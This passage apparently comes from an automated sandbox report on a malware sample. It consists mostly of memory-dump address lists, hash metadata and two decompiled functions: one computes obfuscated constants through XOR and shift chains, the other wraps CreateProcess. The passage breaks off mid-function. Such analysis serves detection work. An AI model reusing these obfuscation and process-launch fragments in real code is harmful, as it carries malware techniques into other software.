                                                                                                                                                                                                                    0x00a65790
                                                                                                                                                                                                                    0x00a65798
                                                                                                                                                                                                                    0x00a6579d
                                                                                                                                                                                                                    0x00a657a5
                                                                                                                                                                                                                    0x00a657ad
                                                                                                                                                                                                                    0x00a657b2
                                                                                                                                                                                                                    0x00a657ba
                                                                                                                                                                                                                    0x00a657c2
                                                                                                                                                                                                                    0x00a657ca
                                                                                                                                                                                                                    0x00a657cf
                                                                                                                                                                                                                    0x00a657d4
                                                                                                                                                                                                                    0x00a657d9
                                                                                                                                                                                                                    0x00a657e3
                                                                                                                                                                                                                    0x00a657f1
                                                                                                                                                                                                                    0x00a657f6
                                                                                                                                                                                                                    0x00a65801
                                                                                                                                                                                                                    0x00a65802
                                                                                                                                                                                                                    0x00a65806
                                                                                                                                                                                                                    0x00a6580e
                                                                                                                                                                                                                    0x00a65816
                                                                                                                                                                                                                    0x00a65821
                                                                                                                                                                                                                    0x00a6582c
                                                                                                                                                                                                                    0x00a65837
                                                                                                                                                                                                                    0x00a6583f
                                                                                                                                                                                                                    0x00a65843
                                                                                                                                                                                                                    0x00a6584b
                                                                                                                                                                                                                    0x00a65853
                                                                                                                                                                                                                    0x00a65858
                                                                                                                                                                                                                    0x00a65860
                                                                                                                                                                                                                    0x00a65868
                                                                                                                                                                                                                    0x00a65870
                                                                                                                                                                                                                    0x00a65878
                                                                                                                                                                                                                    0x00a65880
                                                                                                                                                                                                                    0x00a65888
                                                                                                                                                                                                                    0x00a6589b
                                                                                                                                                                                                                    0x00a658a2
                                                                                                                                                                                                                    0x00a658ad
                                                                                                                                                                                                                    0x00a658b5
                                                                                                                                                                                                                    0x00a658bd
                                                                                                                                                                                                                    0x00a658c1
                                                                                                                                                                                                                    0x00a658c9
                                                                                                                                                                                                                    0x00a658d1
                                                                                                                                                                                                                    0x00a658d6
                                                                                                                                                                                                                    0x00a658de
                                                                                                                                                                                                                    0x00a658e6
                                                                                                                                                                                                                    0x00a658ee
                                                                                                                                                                                                                    0x00a658f6
                                                                                                                                                                                                                    0x00a658fb
                                                                                                                                                                                                                    0x00a65900
                                                                                                                                                                                                                    0x00a65908
                                                                                                                                                                                                                    0x00a65910
                                                                                                                                                                                                                    0x00a65924
                                                                                                                                                                                                                    0x00a6592b
                                                                                                                                                                                                                    0x00a65936
                                                                                                                                                                                                                    0x00a65941
                                                                                                                                                                                                                    0x00a6594c
                                                                                                                                                                                                                    0x00a65957
                                                                                                                                                                                                                    0x00a6595f
                                                                                                                                                                                                                    0x00a65967
                                                                                                                                                                                                                    0x00a6596f
                                                                                                                                                                                                                    0x00a65977
                                                                                                                                                                                                                    0x00a6597f
                                                                                                                                                                                                                    0x00a65987
                                                                                                                                                                                                                    0x00a6598f
                                                                                                                                                                                                                    0x00a65997
                                                                                                                                                                                                                    0x00a6599f
                                                                                                                                                                                                                    0x00a659a4
                                                                                                                                                                                                                    0x00a659ac
                                                                                                                                                                                                                    0x00a659b4
                                                                                                                                                                                                                    0x00a659c1
                                                                                                                                                                                                                    0x00a659c5
                                                                                                                                                                                                                    0x00a659cd
                                                                                                                                                                                                                    0x00a659d5
                                                                                                                                                                                                                    0x00a659e0
                                                                                                                                                                                                                    0x00a659eb
                                                                                                                                                                                                                    0x00a659f6
                                                                                                                                                                                                                    0x00a65a01
                                                                                                                                                                                                                    0x00a65a0c
                                                                                                                                                                                                                    0x00a65a17
                                                                                                                                                                                                                    0x00a65a1f
                                                                                                                                                                                                                    0x00a65a27
                                                                                                                                                                                                                    0x00a65a2f
                                                                                                                                                                                                                    0x00a65a37
                                                                                                                                                                                                                    0x00a65a3f
                                                                                                                                                                                                                    0x00a65a47
                                                                                                                                                                                                                    0x00a65a4f
                                                                                                                                                                                                                    0x00a65a59
                                                                                                                                                                                                                    0x00a65a61
                                                                                                                                                                                                                    0x00a65a69
                                                                                                                                                                                                                    0x00a65a71
                                                                                                                                                                                                                    0x00a65a79
                                                                                                                                                                                                                    0x00a65a81
                                                                                                                                                                                                                    0x00a65a8d
                                                                                                                                                                                                                    0x00a65a90
                                                                                                                                                                                                                    0x00a65a94
                                                                                                                                                                                                                    0x00a65a9c
                                                                                                                                                                                                                    0x00a65aa4
                                                                                                                                                                                                                    0x00a65aaf
                                                                                                                                                                                                                    0x00a65aba
                                                                                                                                                                                                                    0x00a65ac5
                                                                                                                                                                                                                    0x00a65acd
                                                                                                                                                                                                                    0x00a65ad5
                                                                                                                                                                                                                    0x00a65add
                                                                                                                                                                                                                    0x00a65ae5
                                                                                                                                                                                                                    0x00a65aed
                                                                                                                                                                                                                    0x00a65afa
                                                                                                                                                                                                                    0x00a65afe
                                                                                                                                                                                                                    0x00a65b02
                                                                                                                                                                                                                    0x00a65b0a
                                                                                                                                                                                                                    0x00a65b16
                                                                                                                                                                                                                    0x00a65b1b
                                                                                                                                                                                                                    0x00a65b21
                                                                                                                                                                                                                    0x00a65b29
                                                                                                                                                                                                                    0x00a65b31
                                                                                                                                                                                                                    0x00a65b3d
                                                                                                                                                                                                                    0x00a65b40
                                                                                                                                                                                                                    0x00a65b44
                                                                                                                                                                                                                    0x00a65b4c
                                                                                                                                                                                                                    0x00a65b54
                                                                                                                                                                                                                    0x00a65b66
                                                                                                                                                                                                                    0x00a65c22
                                                                                                                                                                                                                    0x00a65c2b
                                                                                                                                                                                                                    0x00a65c32
                                                                                                                                                                                                                    0x00a65c51
                                                                                                                                                                                                                    0x00a65c68
                                                                                                                                                                                                                    0x00a65c6e
                                                                                                                                                                                                                    0x00a65c76
                                                                                                                                                                                                                    0x00a65c7c
                                                                                                                                                                                                                    0x00a65c81
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65b6c
                                                                                                                                                                                                                    0x00a65b72
                                                                                                                                                                                                                    0x00a65c0b
                                                                                                                                                                                                                    0x00a65c10
                                                                                                                                                                                                                    0x00a65c15
                                                                                                                                                                                                                    0x00a65c18
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65b74
                                                                                                                                                                                                                    0x00a65b7a
                                                                                                                                                                                                                    0x00a65ba6
                                                                                                                                                                                                                    0x00a65ba8
                                                                                                                                                                                                                    0x00a65bac
                                                                                                                                                                                                                    0x00a65bb0
                                                                                                                                                                                                                    0x00a65bb1
                                                                                                                                                                                                                    0x00a65bb1
                                                                                                                                                                                                                    0x00a65bb4
                                                                                                                                                                                                                    0x00a65bb6
                                                                                                                                                                                                                    0x00a65bcb
                                                                                                                                                                                                                    0x00a65bcb
                                                                                                                                                                                                                    0x00a65bce
                                                                                                                                                                                                                    0x00a65bd1
                                                                                                                                                                                                                    0x00a65bd4
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65bbf
                                                                                                                                                                                                                    0x00a65bc3
                                                                                                                                                                                                                    0x00a65bc5
                                                                                                                                                                                                                    0x00a65bc8
                                                                                                                                                                                                                    0x00a65bc8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65bc8
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65bc3
                                                                                                                                                                                                                    0x00a65bd6
                                                                                                                                                                                                                    0x00a65bda
                                                                                                                                                                                                                    0x00a65bdd
                                                                                                                                                                                                                    0x00a65bdd
                                                                                                                                                                                                                    0x00a65bde
                                                                                                                                                                                                                    0x00a65be1
                                                                                                                                                                                                                    0x00a65be1
                                                                                                                                                                                                                    0x00a65bb1
                                                                                                                                                                                                                    0x00a65be6
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65b7c
                                                                                                                                                                                                                    0x00a65b82
                                                                                                                                                                                                                    0x00a65d59
                                                                                                                                                                                                                    0x00a65d5a
                                                                                                                                                                                                                    0x00a65d5b
                                                                                                                                                                                                                    0x00a65d5c
                                                                                                                                                                                                                    0x00a65d60
                                                                                                                                                                                                                    0x00a65d61
                                                                                                                                                                                                                    0x00a65d65
                                                                                                                                                                                                                    0x00a65d70
                                                                                                                                                                                                                    0x00a65d7a
                                                                                                                                                                                                                    0x00a65d7a
                                                                                                                                                                                                                    0x00a65b88
                                                                                                                                                                                                                    0x00a65b8e
                                                                                                                                                                                                                    0x00a65d4b
                                                                                                                                                                                                                    0x00a65d4b
                                                                                                                                                                                                                    0x00a65d51
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65d57
                                                                                                                                                                                                                    0x00a65b94
                                                                                                                                                                                                                    0x00a65b9d
                                                                                                                                                                                                                    0x00a65b9f
                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                    0x00a65b9f
                                                                                                                                                                                                                    0x00a65b8e
                                                                                                                                                                                                                    0x00a65b82
                                                                                                                                                                                                                    0x00a65b7a
                                                                                                                                                                                                                    0x00a65b72
                                                                                                                                                                                                                    0x00a65d87
                                                                                                                                                                                                                    0x00a65d87
                                                                                                                                                                                                                    0x00a65cb1
                                                                                                                                                                                                                    0x00a65cd8
                                                                                                                                                                                                                    0x00a65cdd
                                                                                                                                                                                                                    0x00a65ce6
                                                                                                                                                                                                                    0x00a65cea
                                                                                                                                                                                                                    0x00a65d28
                                                                                                                                                                                                                    0x00a65d3a
                                                                                                                                                                                                                    0x00a65d3e
                                                                                                                                                                                                                    0x00a65d43
                                                                                                                                                                                                                    0x00a65d46
                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                    • String ID: "NH$GIK$i0G$mF|$z8$5
                                                                                                                                                                                                                    • API String ID: 0-2214460496
                                                                                                                                                                                                                    • Opcode ID: c133bced4d25846ddaeaf5e731f4cccff5b3d7fecfb11afd4d0b239ac2f0c057
                                                                                                                                                                                                                    • Instruction ID: 3769514fdc6961066527f7c471b50743c8507d217dfeb84013fc26c02bb347d8
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c133bced4d25846ddaeaf5e731f4cccff5b3d7fecfb11afd4d0b239ac2f0c057
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9F0210725083809FD368CF25C98AA5BBBF2FBC5708F10891DF69986261D7B58949CF43
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                    			E00A7E05C(void* __edx, void* __eflags) {
                                                                                                                                                                                                                    				void* _t179;
                                                                                                                                                                                                                    				void* _t198;
                                                                                                                                                                                                                    				void* _t199;
                                                                                                                                                                                                                    				signed int _t203;
                                                                                                                                                                                                                    				signed int _t204;
                                                                                                                                                                                                                    				signed int _t205;
                                                                                                                                                                                                                    				intOrPtr _t222;
                                                                                                                                                                                                                    				intOrPtr _t225;
                                                                                                                                                                                                                    				void* _t228;
                                                                                                                                                                                                                    				void* _t229;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_t228 = _t229 - 0x5c;
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t228 + 0x7c)));
                                                                                                                                                                                                                    				_t222 =  *((intOrPtr*)(_t228 + 0x78));
                                                                                                                                                                                                                    				_push(_t222);
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t228 + 0x74)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t228 + 0x70)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t228 + 0x6c)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t228 + 0x68)));
                                                                                                                                                                                                                    				_push( *((intOrPtr*)(_t228 + 0x64)));
                                                                                                                                                                                                                    				_push(__edx);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				E00A7C6D8(_t179);
                                                                                                                                                                                                                    				 *(_t228 + 0x14) =  *(_t228 + 0x14) & 0x00000000;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t228 + 8)) = 0x3ef0d2;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t228 + 0xc)) = 0x50acde;
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t228 + 0x10)) = 0x58313d;
                                                                                                                                                                                                                    				 *(_t228 + 0x1c) = 0xbde8e3;
                                                                                                                                                                                                                    				 *(_t228 + 0x1c) =  *(_t228 + 0x1c) + 0xffff774d;
                                                                                                                                                                                                                    				 *(_t228 + 0x1c) =  *(_t228 + 0x1c) ^ 0x00b0eb36;
                                                                                                                                                                                                                    				 *(_t228 + 0x20) = 0x97c3f6;
                                                                                                                                                                                                                    				 *(_t228 + 0x20) =  *(_t228 + 0x20) + 0x6748;
                                                                                                                                                                                                                    				 *(_t228 + 0x20) =  *(_t228 + 0x20) ^ 0x0098d1ad;
                                                                                                                                                                                                                    				 *(_t228 + 0x44) = 0x20cc71;
                                                                                                                                                                                                                    				 *(_t228 + 0x44) =  *(_t228 + 0x44) << 9;
                                                                                                                                                                                                                    				_t203 = 0x70;
                                                                                                                                                                                                                    				 *(_t228 + 0x44) =  *(_t228 + 0x44) * 0x6f;
                                                                                                                                                                                                                    				 *(_t228 + 0x44) =  *(_t228 + 0x44) >> 5;
                                                                                                                                                                                                                    				 *(_t228 + 0x44) =  *(_t228 + 0x44) ^ 0x038d5961;
                                                                                                                                                                                                                    				 *(_t228 + 0x54) = 0x98ecf2;
                                                                                                                                                                                                                    				 *(_t228 + 0x54) =  *(_t228 + 0x54) | 0x781bf9d3;
                                                                                                                                                                                                                    				 *(_t228 + 0x54) =  *(_t228 + 0x54) >> 9;
                                                                                                                                                                                                                    				 *(_t228 + 0x54) =  *(_t228 + 0x54) | 0xc3ffc186;
                                                                                                                                                                                                                    				 *(_t228 + 0x54) =  *(_t228 + 0x54) ^ 0xc3f7c688;
                                                                                                                                                                                                                    				 *(_t228 + 0x58) = 0xa06b3c;
                                                                                                                                                                                                                    				 *(_t228 + 0x58) =  *(_t228 + 0x58) * 3;
                                                                                                                                                                                                                    				 *(_t228 + 0x58) =  *(_t228 + 0x58) / _t203;
                                                                                                                                                                                                                    				 *(_t228 + 0x58) =  *(_t228 + 0x58) + 0xffff7d85;
                                                                                                                                                                                                                    				 *(_t228 + 0x58) =  *(_t228 + 0x58) ^ 0x00060d7d;
                                                                                                                                                                                                                    				 *(_t228 + 0x18) = 0xa8bd5c;
                                                                                                                                                                                                                    				 *(_t228 + 0x18) =  *(_t228 + 0x18) ^ 0xe15fb2d1;
                                                                                                                                                                                                                    				 *(_t228 + 0x18) =  *(_t228 + 0x18) ^ 0xe1f4dd8f;
                                                                                                                                                                                                                    				 *(_t228 + 0x3c) = 0xaceec8;
                                                                                                                                                                                                                    				 *(_t228 + 0x3c) =  *(_t228 + 0x3c) + 0x42f5;
                                                                                                                                                                                                                    				 *(_t228 + 0x3c) =  *(_t228 + 0x3c) ^ 0x4d6e4b69;
                                                                                                                                                                                                                    				_t204 = 0x2e;
                                                                                                                                                                                                                    				 *(_t228 + 0x3c) =  *(_t228 + 0x3c) * 0x79;
                                                                                                                                                                                                                    				 *(_t228 + 0x3c) =  *(_t228 + 0x3c) ^ 0xc16b333b;
                                                                                                                                                                                                                    				 *(_t228 + 0x30) = 0x53d98c;
                                                                                                                                                                                                                    				 *(_t228 + 0x30) =  *(_t228 + 0x30) >> 0xd;
                                                                                                                                                                                                                    				 *(_t228 + 0x30) =  *(_t228 + 0x30) << 0x10;
                                                                                                                                                                                                                    				 *(_t228 + 0x30) =  *(_t228 + 0x30) ^ 0x029bbda9;
                                                                                                                                                                                                                    				 *(_t228 + 0x28) = 0x87badc;
                                                                                                                                                                                                                    				 *(_t228 + 0x28) =  *(_t228 + 0x28) + 0x8010;
                                                                                                                                                                                                                    				 *(_t228 + 0x28) =  *(_t228 + 0x28) << 3;
                                                                                                                                                                                                                    				 *(_t228 + 0x28) =  *(_t228 + 0x28) ^ 0x044ad4ba;
                                                                                                                                                                                                                    				 *(_t228 + 0x34) = 0x79c586;
                                                                                                                                                                                                                    				 *(_t228 + 0x34) =  *(_t228 + 0x34) ^ 0x83116835;
                                                                                                                                                                                                                    				 *(_t228 + 0x34) =  *(_t228 + 0x34) + 0x291a;
                                                                                                                                                                                                                    				 *(_t228 + 0x34) =  *(_t228 + 0x34) ^ 0x836cef9d;
                                                                                                                                                                                                                    				 *(_t228 + 0x4c) = 0xe57d6b;
                                                                                                                                                                                                                    				 *(_t228 + 0x4c) =  *(_t228 + 0x4c) << 2;
                                                                                                                                                                                                                    				 *(_t228 + 0x4c) =  *(_t228 + 0x4c) | 0x757b8ffc;
                                                                                                                                                                                                                    				 *(_t228 + 0x4c) =  *(_t228 + 0x4c) ^ 0x77f9b3b7;
                                                                                                                                                                                                                    				 *(_t228 + 0x48) = 0xf00899;
                                                                                                                                                                                                                    				 *(_t228 + 0x48) =  *(_t228 + 0x48) << 4;
                                                                                                                                                                                                                    				 *(_t228 + 0x48) =  *(_t228 + 0x48) / _t204;
                                                                                                                                                                                                                    				 *(_t228 + 0x48) =  *(_t228 + 0x48) * 7;
                                                                                                                                                                                                                    				 *(_t228 + 0x48) =  *(_t228 + 0x48) ^ 0x0248c405;
                                                                                                                                                                                                                    				 *(_t228 + 0x50) = 0x9c22f2;
                                                                                                                                                                                                                    				 *(_t228 + 0x50) =  *(_t228 + 0x50) | 0xc51973e3;
                                                                                                                                                                                                                    				_t205 = 0x6f;
                                                                                                                                                                                                                    				 *(_t228 + 0x50) =  *(_t228 + 0x50) * 0x61;
                                                                                                                                                                                                                    				 *(_t228 + 0x50) =  *(_t228 + 0x50) << 0xa;
                                                                                                                                                                                                                    				 *(_t228 + 0x50) =  *(_t228 + 0x50) ^ 0xa3b26a13;
                                                                                                                                                                                                                    				 *(_t228 + 0x2c) = 0xe70e52;
                                                                                                                                                                                                                    				 *(_t228 + 0x2c) =  *(_t228 + 0x2c) + 0xffff6497;
                                                                                                                                                                                                                    				 *(_t228 + 0x2c) =  *(_t228 + 0x2c) * 0x31;
                                                                                                                                                                                                                    				 *(_t228 + 0x2c) =  *(_t228 + 0x2c) ^ 0x2c1ca77b;
                                                                                                                                                                                                                    				 *(_t228 + 0x38) = 0xd57fd6;
                                                                                                                                                                                                                    				 *(_t228 + 0x38) =  *(_t228 + 0x38) | 0xbfdbebff;
                                                                                                                                                                                                                    				 *(_t228 + 0x38) =  *(_t228 + 0x38) ^ 0xbfda7b7b;
                                                                                                                                                                                                                    				 *(_t228 + 0x40) = 0x7c2b;
                                                                                                                                                                                                                    				 *(_t228 + 0x40) =  *(_t228 + 0x40) + 0x2862;
                                                                                                                                                                                                                    				 *(_t228 + 0x40) =  *(_t228 + 0x40) ^ 0x31c77eaf;
                                                                                                                                                                                                                    				 *(_t228 + 0x40) =  *(_t228 + 0x40) / _t205;
                                                                                                                                                                                                                    				 *(_t228 + 0x40) =  *(_t228 + 0x40) ^ 0x007886b5;
                                                                                                                                                                                                                    				 *(_t228 + 0x24) = 0xaacb47;
                                                                                                                                                                                                                    				 *(_t228 + 0x24) =  *(_t228 + 0x24) * 0x43;
                                                                                                                                                                                                                    				 *(_t228 + 0x24) =  *(_t228 + 0x24) + 0xffffb469;
                                                                                                                                                                                                                    				 *(_t228 + 0x24) =  *(_t228 + 0x24) ^ 0x2cb36511;
                                                                                                                                                                                                                    				_push( *(_t228 + 0x54));
                                                                                                                                                                                                                    				_push( *(_t228 + 0x44));
                                                                                                                                                                                                                    				_push( *(_t228 + 0x20));
                                                                                                                                                                                                                    				_t206 =  *(_t228 + 0x1c);
                                                                                                                                                                                                                    				_push(_t228 - 0x4c);
                                                                                                                                                                                                                    				_t225 = 0x44;
                                                                                                                                                                                                                    				E00A73FA6( *(_t228 + 0x1c), _t225);
                                                                                                                                                                                                                    				 *((intOrPtr*)(_t228 - 0x4c)) = _t225;
                                                                                                                                                                                                                    				_t198 = E00A7A342( *((intOrPtr*)(_t228 + 0x7c)),  *(_t228 + 0x58),  *(_t228 + 0x18),  *(_t228 + 0x3c),  *((intOrPtr*)(_t228 + 0x74)),  *(_t228 + 0x1c),  *(_t228 + 0x30), _t206,  *(_t228 + 0x28), _t206, _t206, _t228 - 0x4c,  *((intOrPtr*)(_t228 + 0x6c)), _t206,  *(_t228 + 0x34),  *(_t228 + 0x4c), _t228 - 8); // executed
                                                                                                                                                                                                                    				if(_t198 == 0) {
                                                                                                                                                                                                                    					_t199 = 0;
                                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                                    					if(_t222 == 0) {
                                                                                                                                                                                                                    						E00A6E2BD( *((intOrPtr*)(_t228 - 8)),  *(_t228 + 0x48),  *(_t228 + 0x50),  *(_t228 + 0x2c));
                                                                                                                                                                                                                    						E00A6E2BD( *((intOrPtr*)(_t228 - 4)),  *(_t228 + 0x38),  *(_t228 + 0x40),  *(_t228 + 0x24));
                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                    						asm("movsd");
                                                                                                                                                                                                                    						asm("movsd");
                                                                                                                                                                                                                    						asm("movsd");
                                                                                                                                                                                                                    						asm("movsd");
                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                    					_t199 = 1;
                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                    				return _t199;
                                                                                                                                                                                                                    			}













                                                                                                                                                                                                                    0x00a7e05d
                                                                                                                                                                                                                    0x00a7e069
                                                                                                                                                                                                                    0x00a7e06c
                                                                                                                                                                                                                    0x00a7e06f
                                                                                                                                                                                                                    0x00a7e070
                                                                                                                                                                                                                    0x00a7e073
                                                                                                                                                                                                                    0x00a7e076
                                                                                                                                                                                                                    0x00a7e079
                                                                                                                                                                                                                    0x00a7e07c
                                                                                                                                                                                                                    0x00a7e07f
                                                                                                                                                                                                                    0x00a7e080
                                                                                                                                                                                                                    0x00a7e082
                                                                                                                                                                                                                    0x00a7e087
                                                                                                                                                                                                                    0x00a7e08d
                                                                                                                                                                                                                    0x00a7e094
                                                                                                                                                                                                                    0x00a7e09b
                                                                                                                                                                                                                    0x00a7e0a2
                                                                                                                                                                                                                    0x00a7e0a9
                                                                                                                                                                                                                    0x00a7e0b0
                                                                                                                                                                                                                    0x00a7e0b7
                                                                                                                                                                                                                    0x00a7e0be
                                                                                                                                                                                                                    0x00a7e0c5
                                                                                                                                                                                                                    0x00a7e0cc
                                                                                                                                                                                                                    0x00a7e0d3
                                                                                                                                                                                                                    0x00a7e0dd
                                                                                                                                                                                                                    0x00a7e0e0
                                                                                                                                                                                                                    0x00a7e0e3
                                                                                                                                                                                                                    0x00a7e0e7
                                                                                                                                                                                                                    0x00a7e0ee
                                                                                                                                                                                                                    0x00a7e0f5
                                                                                                                                                                                                                    0x00a7e0fc
                                                                                                                                                                                                                    0x00a7e100
                                                                                                                                                                                                                    0x00a7e107
                                                                                                                                                                                                                    0x00a7e10e
                                                                                                                                                                                                                    0x00a7e119
                                                                                                                                                                                                                    0x00a7e123
                                                                                                                                                                                                                    0x00a7e126
                                                                                                                                                                                                                    0x00a7e12d
                                                                                                                                                                                                                    0x00a7e134
                                                                                                                                                                                                                    0x00a7e13b
                                                                                                                                                                                                                    0x00a7e142
                                                                                                                                                                                                                    0x00a7e149
                                                                                                                                                                                                                    0x00a7e150
                                                                                                                                                                                                                    0x00a7e157
                                                                                                                                                                                                                    0x00a7e162
                                                                                                                                                                                                                    0x00a7e163
                                                                                                                                                                                                                    0x00a7e166
                                                                                                                                                                                                                    0x00a7e16d
                                                                                                                                                                                                                    0x00a7e174
                                                                                                                                                                                                                    0x00a7e178
                                                                                                                                                                                                                    0x00a7e17c
                                                                                                                                                                                                                    0x00a7e183
                                                                                                                                                                                                                    0x00a7e18a
                                                                                                                                                                                                                    0x00a7e191
                                                                                                                                                                                                                    0x00a7e195
                                                                                                                                                                                                                    0x00a7e19c
                                                                                                                                                                                                                    0x00a7e1a3
                                                                                                                                                                                                                    0x00a7e1aa
                                                                                                                                                                                                                    0x00a7e1b1
                                                                                                                                                                                                                    0x00a7e1b8
                                                                                                                                                                                                                    0x00a7e1bf
                                                                                                                                                                                                                    0x00a7e1c3
                                                                                                                                                                                                                    0x00a7e1ca
                                                                                                                                                                                                                    0x00a7e1d1
                                                                                                                                                                                                                    0x00a7e1d8
                                                                                                                                                                                                                    0x00a7e1e1
                                                                                                                                                                                                                    0x00a7e1e8
                                                                                                                                                                                                                    0x00a7e1eb
                                                                                                                                                                                                                    0x00a7e1f2
                                                                                                                                                                                                                    0x00a7e1fb
                                                                                                                                                                                                                    0x00a7e208
                                                                                                                                                                                                                    0x00a7e209
                                                                                                                                                                                                                    0x00a7e20c
                                                                                                                                                                                                                    0x00a7e210
                                                                                                                                                                                                                    0x00a7e217
                                                                                                                                                                                                                    0x00a7e21e
                                                                                                                                                                                                                    0x00a7e229
                                                                                                                                                                                                                    0x00a7e22c
                                                                                                                                                                                                                    0x00a7e233
                                                                                                                                                                                                                    0x00a7e23a
                                                                                                                                                                                                                    0x00a7e241
                                                                                                                                                                                                                    0x00a7e248
                                                                                                                                                                                                                    0x00a7e24f
                                                                                                                                                                                                                    0x00a7e256
                                                                                                                                                                                                                    0x00a7e262
                                                                                                                                                                                                                    0x00a7e265
                                                                                                                                                                                                                    0x00a7e26c
                                                                                                                                                                                                                    0x00a7e277
                                                                                                                                                                                                                    0x00a7e27d
                                                                                                                                                                                                                    0x00a7e284
                                                                                                                                                                                                                    0x00a7e28b
                                                                                                                                                                                                                    0x00a7e28e
                                                                                                                                                                                                                    0x00a7e291
                                                                                                                                                                                                                    0x00a7e294
                                                                                                                                                                                                                    0x00a7e297
                                                                                                                                                                                                                    0x00a7e29a
                                                                                                                                                                                                                    0x00a7e29d
                                                                                                                                                                                                                    0x00a7e2a5
                                                                                                                                                                                                                    0x00a7e2d3
                                                                                                                                                                                                                    0x00a7e2dd
                                                                                                                                                                                                                    0x00a7e316
                                                                                                                                                                                                                    0x00a7e2df
                                                                                                                                                                                                                    0x00a7e2e1
                                                                                                                                                                                                                    0x00a7e2fb
                                                                                                                                                                                                                    0x00a7e30c
                                                                                                                                                                                                                    0x00a7e2e3
                                                                                                                                                                                                                    0x00a7e2e6
                                                                                                                                                                                                                    0x00a7e2e7
                                                                                                                                                                                                                    0x00a7e2e8
                                                                                                                                                                                                                    0x00a7e2e9
                                                                                                                                                                                                                    0x00a7e2e9
                                                                                                                                                                                                                    0x00a7e2ec
                                                                                                                                                                                                                    0x00a7e2ec
                                                                                                                                                                                                                    0x00a7e31e

                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                    • Source File: 00000000.00000002.845522080.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true
                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                    • API ID: CreateProcess
                                                                                                                                                                                                                    • String ID: =1X$iKnM$k}
                                                                                                                                                                                                                    • API String ID: 963392458-360394387
                                                                                                                                                                                                                    • Opcode ID: 2d6913ea1c7a266ac566d2c633cd874680f55712ca92b9c5f5178b8edd6bb75b
                                                                                                                                                                                                                    • Instruction ID: 0b6d652133283381e3ca170f80da799a12b67e7785a6fe20b49371b5c152ef9a
                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2d6913ea1c7a266ac566d2c633cd874680f55712ca92b9c5f5178b8edd6bb75b
                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BA91FFB2401288EBDF58DF64C98A9CA3FB5FF48348F108219FD2996260D3B6D955CF84
                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                    C-Code - Quality: 33%
                                                                                                                                                                                                                    			E00A7A342(WCHAR* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, int _a12, intOrPtr _a20, intOrPtr _a28, struct _STARTUPINFOW* _a40, WCHAR* _a44, intOrPtr _a52, intOrPtr _a56, struct _PROCESS_INFORMATION* _a60) {
                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                    				signed int _v12;
                                                                                                                                                                                                                    				struct _SECURITY_ATTRIBUTES* _v16;
                                                                                                                                                                                                                    				intOrPtr _v20;
                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                    				int _t40;
                                                                                                                                                                                                                    				signed int _t42;
                                                                                                                                                                                                                    				WCHAR* _t48;
                                                                                                                                                                                                                    
                                                                                                                                                                                                                    				_push(_a60);
                                                                                                                                                                                                                    				_t48 = __ecx;
                                                                                                                                                                                                                    				_push(_a56);
                                                                                                                                                                                                                    				_push(_a52);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a44);
                                                                                                                                                                                                                    				_push(_a40);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a28);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a20);
                                                                                                                                                                                                                    				_push(0);
                                                                                                                                                                                                                    				_push(_a12);
                                                                                                                                                                                                                    				_push(_a8);
                                                                                                                                                                                                                    				_push(_a4);
                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                    				E00A7C6D8(_t33);
                                                                                                                                                                                                                    				_v20 = 0xe77ed2;
                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                    				_v12 = 0xc32920;
                                                                                                                                                                                                                    				_t42 = 0x46;
                                                                                                                                                                                                                    				_v12 = _v12 / _t42;
                                                                                                                                                                                                                    				_v12 = _v12 ^ 0x0003aaee;
                                                                                                                                                                                                                    				_v8 = 0xe3b22a;
                                                                                                                                                                                                                    				_v8 = _v8 + 0xffff15b6;
